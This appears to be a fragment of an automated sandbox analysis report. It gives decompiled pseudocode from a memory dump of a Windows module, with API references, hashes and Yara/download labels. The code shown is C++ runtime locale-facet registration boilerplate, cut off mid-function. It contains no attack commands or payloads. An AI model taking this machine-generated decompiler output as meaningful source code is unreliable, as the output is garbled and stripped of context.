																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6E1A161C(0x6e286d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6E1C66BA(_t594 - 0x14);
																							return E6E1E0075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6E1D13A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t594 - 0x20);
																									E6E1E3D74(_t594 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t420, _t559, _t573, 0x14);
																									E6E1C6653(_t594 - 0x14, 0);
																									_t574 =  *0x6e286ddc;
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6E1A161C(0x6e286d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6E1C66BA(_t594 - 0x14);
																										return E6E1E0075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6E1D1409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t594 - 0x20);
																												E6E1E3D74(_t594 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t420, _t560, _t574, 0x14);
																												E6E1C6653(_t594 - 0x14, 0);
																												_t575 =  *0x6e286de0;
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6E1A161C(0x6e286d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6E1C66BA(_t594 - 0x14);
																													return E6E1E0075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6E1D1471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t594 - 0x20);
																															E6E1E3D74(_t594 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t420, _t561, _t575, 0x14);
																															E6E1C6653(_t594 - 0x14, 0);
																															_t576 =  *0x6e286dfc;
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6E1A161C(0x6e286da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6E1C66BA(_t594 - 0x14);
																																return E6E1E0075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6E1D14EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t594 - 0x20);
																																		E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t420, _t562, _t576, 0x14);
																																		E6E1C6653(_t594 - 0x14, 0);
																																		_t577 =  *0x6e286dcc;
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6E1A161C(0x6e286d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6E1C66BA(_t594 - 0x14);
																																			return E6E1E0075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6E1D1558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t594 - 0x20);
																																					E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t420, _t563, _t577, 0x14);
																																					E6E1C6653(_t594 - 0x14, 0);
																																					_t578 =  *0x6e286e00;
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6E1A161C(0x6e286dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6E1C66BA(_t594 - 0x14);
																																						return E6E1E0075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6E1D15C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t594 - 0x20);
																																								E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t420, _t564, _t578, 0x14);
																																								E6E1C6653(_t594 - 0x14, 0);
																																								_t579 =  *0x6e286dd0;
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6E1A161C(0x6e286d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6E1C66BA(_t594 - 0x14);
																																									return E6E1E0075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6E1D162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6E1A1438(_t511);
																																											E6E1E3D74(_t594 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e22851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6e22c0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6E1D542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6E1E0075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t565);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6e286dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t564);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6e286e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t563);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6e286dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t562);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6e286dfc = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6E1C6FD3(__eflags, _t561);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6e286de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6E1C6FD3(__eflags, _t560);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6e286ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6E1C6FD3(__eflags, _t559);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6e286db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6E1C6FD3(__eflags, _t558);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6e286dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6E1C6FD3(__eflags, _t557);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6e286dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6E1C6FD3(__eflags, _t556);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6e286dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6E1C6FD3(__eflags, _t555);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6e286df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6E1C6FD3(__eflags, _t554);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6e286df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6E1C6FD3(__eflags, _t553);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6e286dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF4C8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF4D2
int.LIBCPMT ref: 6E1CF4E9

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF523
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF543
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF561

Strings

tm(n, xrefs: 6E1CF4DD

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: tm(n
API String ID: 651022567-1916883537
Opcode ID: f20890f349fbd95872e7630ea3b1d1d7528ad4eff45bfcfd19cb7b4d94c63511
Instruction ID: a623e47812fada3c68ea31d63167a888b1411e1e5eb347ca1a416cca47a24bb8
Opcode Fuzzy Hash: f20890f349fbd95872e7630ea3b1d1d7528ad4eff45bfcfd19cb7b4d94c63511
Instruction Fuzzy Hash: 0F110AB591051D8BCF01EFD4C854AFEB77ABF64B14F240908D520E7290DF789988E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t682 - 0x14, 0);
				_t651 =  *0x6e286dbc;
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6E1A161C(0x6e286d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6E1C66BA(_t682 - 0x14);
					return E6E1E0075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6E1D0FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t682 - 0x20);
							E6E1E3D74(_t682 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t635, _t651, 0x14);
							E6E1C6653(_t682 - 0x14, 0);
							_t652 =  *0x6e286df0;
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6E1A161C(0x6e286d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6E1C66BA(_t682 - 0x14);
								return E6E1E0075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6E1D1057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t682 - 0x20);
										E6E1E3D74(_t682 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t482, _t636, _t652, 0x14);
										E6E1C6653(_t682 - 0x14, 0);
										_t653 =  *0x6e286dc0;
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6E1A161C(0x6e286d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6E1C66BA(_t682 - 0x14);
											return E6E1E0075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6E1D10BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t682 - 0x20);
													E6E1E3D74(_t682 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t482, _t637, _t653, 0x14);
													E6E1C6653(_t682 - 0x14, 0);
													_t654 =  *0x6e286df8;
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6E1A161C(0x6e286da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6E1C66BA(_t682 - 0x14);
														return E6E1E0075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6E1D1127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t682 - 0x20);
																E6E1E3D74(_t682 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t482, _t638, _t654, 0x14);
																E6E1C6653(_t682 - 0x14, 0);
																_t655 =  *0x6e286df4;
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6E1A161C(0x6e286da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6E1C66BA(_t682 - 0x14);
																	return E6E1E0075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6E1D11AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t682 - 0x20);
																			E6E1E3D74(_t682 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t482, _t639, _t655, 0x14);
																			E6E1C6653(_t682 - 0x14, 0);
																			_t656 =  *0x6e286dc8;
																			 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																			 *(_t682 - 0x10) = _t656;
																			_t288 = E6E1A161C(0x6e286d7c);
																			_t520 =  *((intOrPtr*)(_t682 + 8));
																			_t640 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t288);
																			__eflags = _t640;
																			if(_t640 != 0) {
																				L40:
																				E6E1C66BA(_t682 - 0x14);
																				return E6E1E0075(_t640);
																			} else {
																				__eflags = _t656;
																				if(_t656 == 0) {
																					_push( *((intOrPtr*)(_t682 + 8)));
																					_push(_t682 - 0x10);
																					__eflags = E6E1D1230(_t482, _t520, _t633, _t640, _t656) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t682 - 0x20);
																						E6E1E3D74(_t682 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t482, _t640, _t656, 0x14);
																						E6E1C6653(_t682 - 0x14, 0);
																						_t657 =  *0x6e286dc4;
																						 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																						 *(_t682 - 0x10) = _t657;
																						_t301 = E6E1A161C(0x6e286d78);
																						_t527 =  *((intOrPtr*)(_t682 + 8));
																						_t641 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t301);
																						__eflags = _t641;
																						if(_t641 != 0) {
																							L47:
																							E6E1C66BA(_t682 - 0x14);
																							return E6E1E0075(_t641);
																						} else {
																							__eflags = _t657;
																							if(_t657 == 0) {
																								_push( *((intOrPtr*)(_t682 + 8)));
																								_push(_t682 - 0x10);
																								__eflags = E6E1D12B4(_t482, _t527, _t633, _t641, _t657) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t682 - 0x20);
																									E6E1E3D74(_t682 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t482, _t641, _t657, 0x14);
																									E6E1C6653(_t682 - 0x14, 0);
																									_t658 =  *0x6e286dd8;
																									 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																									 *(_t682 - 0x10) = _t658;
																									_t314 = E6E1A161C(0x6e286d84);
																									_t534 =  *((intOrPtr*)(_t682 + 8));
																									_t642 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t314);
																									__eflags = _t642;
																									if(_t642 != 0) {
																										L54:
																										E6E1C66BA(_t682 - 0x14);
																										return E6E1E0075(_t642);
																									} else {
																										__eflags = _t658;
																										if(_t658 == 0) {
																											_push( *((intOrPtr*)(_t682 + 8)));
																											_push(_t682 - 0x10);
																											__eflags = E6E1D1339(_t482, _t534, _t633, _t642, _t658) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t682 - 0x20);
																												E6E1E3D74(_t682 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t482, _t642, _t658, 0x14);
																												E6E1C6653(_t682 - 0x14, 0);
																												_t659 =  *0x6e286db0;
																												 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																												 *(_t682 - 0x10) = _t659;
																												_t327 = E6E1A161C(0x6e286d64);
																												_t541 =  *((intOrPtr*)(_t682 + 8));
																												_t643 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t327);
																												__eflags = _t643;
																												if(_t643 != 0) {
																													L61:
																													E6E1C66BA(_t682 - 0x14);
																													return E6E1E0075(_t643);
																												} else {
																													__eflags = _t659;
																													if(_t659 == 0) {
																														_push( *((intOrPtr*)(_t682 + 8)));
																														_push(_t682 - 0x10);
																														__eflags = E6E1D13A1(_t482, _t541, _t633, _t643, _t659) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t682 - 0x20);
																															E6E1E3D74(_t682 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t482, _t643, _t659, 0x14);
																															E6E1C6653(_t682 - 0x14, 0);
																															_t660 =  *0x6e286ddc;
																															 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																															 *(_t682 - 0x10) = _t660;
																															_t340 = E6E1A161C(0x6e286d88);
																															_t548 =  *((intOrPtr*)(_t682 + 8));
																															_t644 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t340);
																															__eflags = _t644;
																															if(_t644 != 0) {
																																L68:
																																E6E1C66BA(_t682 - 0x14);
																																return E6E1E0075(_t644);
																															} else {
																																__eflags = _t660;
																																if(_t660 == 0) {
																																	_push( *((intOrPtr*)(_t682 + 8)));
																																	_push(_t682 - 0x10);
																																	__eflags = E6E1D1409(_t482, _t548, _t633, _t644, _t660) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t682 - 0x20);
																																		E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t482, _t644, _t660, 0x14);
																																		E6E1C6653(_t682 - 0x14, 0);
																																		_t661 =  *0x6e286de0;
																																		 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																		 *(_t682 - 0x10) = _t661;
																																		_t353 = E6E1A161C(0x6e286d8c);
																																		_t555 =  *((intOrPtr*)(_t682 + 8));
																																		_t645 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t353);
																																		__eflags = _t645;
																																		if(_t645 != 0) {
																																			L75:
																																			E6E1C66BA(_t682 - 0x14);
																																			return E6E1E0075(_t645);
																																		} else {
																																			__eflags = _t661;
																																			if(_t661 == 0) {
																																				_push( *((intOrPtr*)(_t682 + 8)));
																																				_push(_t682 - 0x10);
																																				__eflags = E6E1D1471(_t482, _t555, _t633, _t645, _t661) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t682 - 0x20);
																																					E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t482, _t645, _t661, 0x14);
																																					E6E1C6653(_t682 - 0x14, 0);
																																					_t662 =  *0x6e286dfc;
																																					 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																					 *(_t682 - 0x10) = _t662;
																																					_t366 = E6E1A161C(0x6e286da8);
																																					_t562 =  *((intOrPtr*)(_t682 + 8));
																																					_t646 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t366);
																																					__eflags = _t646;
																																					if(_t646 != 0) {
																																						L82:
																																						E6E1C66BA(_t682 - 0x14);
																																						return E6E1E0075(_t646);
																																					} else {
																																						__eflags = _t662;
																																						if(_t662 == 0) {
																																							_push( *((intOrPtr*)(_t682 + 8)));
																																							_push(_t682 - 0x10);
																																							__eflags = E6E1D14EC(_t482, _t562, _t633, _t646, _t662) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t682 - 0x20);
																																								E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t482, _t646, _t662, 0x14);
																																								E6E1C6653(_t682 - 0x14, 0);
																																								_t663 =  *0x6e286dcc;
																																								 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																								 *(_t682 - 0x10) = _t663;
																																								_t379 = E6E1A161C(0x6e286d80);
																																								_t569 =  *((intOrPtr*)(_t682 + 8));
																																								_t647 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t379);
																																								__eflags = _t647;
																																								if(_t647 != 0) {
																																									L89:
																																									E6E1C66BA(_t682 - 0x14);
																																									return E6E1E0075(_t647);
																																								} else {
																																									__eflags = _t663;
																																									if(_t663 == 0) {
																																										_push( *((intOrPtr*)(_t682 + 8)));
																																										_push(_t682 - 0x10);
																																										__eflags = E6E1D1558(_t482, _t569, _t633, _t647, _t663) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t682 - 0x20);
																																											E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t482, _t647, _t663, 0x14);
																																											E6E1C6653(_t682 - 0x14, 0);
																																											_t664 =  *0x6e286e00;
																																											 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																											 *(_t682 - 0x10) = _t664;
																																											_t392 = E6E1A161C(0x6e286dac);
																																											_t576 =  *((intOrPtr*)(_t682 + 8));
																																											_t648 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t392);
																																											__eflags = _t648;
																																											if(_t648 != 0) {
																																												L96:
																																												E6E1C66BA(_t682 - 0x14);
																																												return E6E1E0075(_t648);
																																											} else {
																																												__eflags = _t664;
																																												if(_t664 == 0) {
																																													_push( *((intOrPtr*)(_t682 + 8)));
																																													_push(_t682 - 0x10);
																																													__eflags = E6E1D15C4(_t482, _t576, _t633, _t648, _t664) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t682 - 0x20);
																																														E6E1E3D74(_t682 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t482, _t648, _t664, 0x14);
																																														E6E1C6653(_t682 - 0x14, 0);
																																														_t665 =  *0x6e286dd0;
																																														 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																														 *(_t682 - 0x10) = _t665;
																																														_t405 = E6E1A161C(0x6e286d60);
																																														_t583 =  *((intOrPtr*)(_t682 + 8));
																																														_t649 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t405);
																																														__eflags = _t649;
																																														if(_t649 != 0) {
																																															L103:
																																															E6E1C66BA(_t682 - 0x14);
																																															return E6E1E0075(_t649);
																																														} else {
																																															__eflags = _t665;
																																															if(_t665 == 0) {
